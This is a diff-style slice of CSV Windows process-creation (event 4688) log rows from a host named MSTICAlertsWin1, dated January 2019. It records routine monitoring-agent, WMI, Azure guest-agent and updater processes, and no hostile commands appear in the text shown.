+246,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x57c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.000
+247,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Windows\System32\conhost.exe,%%1936,0x57c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.017
+248,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:25.833,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd78,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:25.833
+249,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1054,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:26.007
+250,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:41:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12dc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:41:26.000
+251,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.000
+252,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0xb8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.017
+253,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.387,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.387
+254,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.437,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd80,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.437
+255,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:26.007
+256,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.240,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,%%1936,0xa40,"""CollectGuestLogs.exe"" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df5-bd9b-e932e7433077.zip",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.240
+257,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.253,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.253
+258,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x54c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:26.000
+259,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x93c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:19:26.000
+260,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.000
+261,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.017
+262,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:25.423,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:25.423
+263,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:26.007
+264,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:31:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:31:26.000
+265,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.010
+266,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x125c,C:\Windows\System32\conhost.exe,%%1936,0xa08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.027
+267,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:25.650,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:25.650
+268,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:26.000
+269,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:27:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x638,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:27:26.000
+270,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:01.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10cc,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:01.517
+271,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x107c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.003
+272,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1064,C:\Windows\System32\conhost.exe,%%1936,0x107c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.020
+273,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1220,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:25.770
+274,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:26.013
+275,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:33.090,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:33.090
+276,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:11:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbd8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:11:26.000
+277,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.007
+278,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\System32\conhost.exe,%%1936,0x123c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.023
+279,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.403,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.403
+280,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.590,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.590
+281,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:26.003
+282,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:29:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xac4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:29:26.010
+283,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.007
+284,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\conhost.exe,%%1936,0x364,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.023
+285,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:25.710,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:25.710
+286,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12e8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:26.000
+287,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.003
+288,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17f0,C:\Windows\System32\conhost.exe,%%1936,0x17fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.020
+289,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1434,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:25.453
+290,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1404,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:26.007
+291,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:26.000
+292,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:43.103,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\System32\taskhostw.exe,%%1936,0x440,taskhostw.exe SYSTEM,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:43.103
+293,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.000
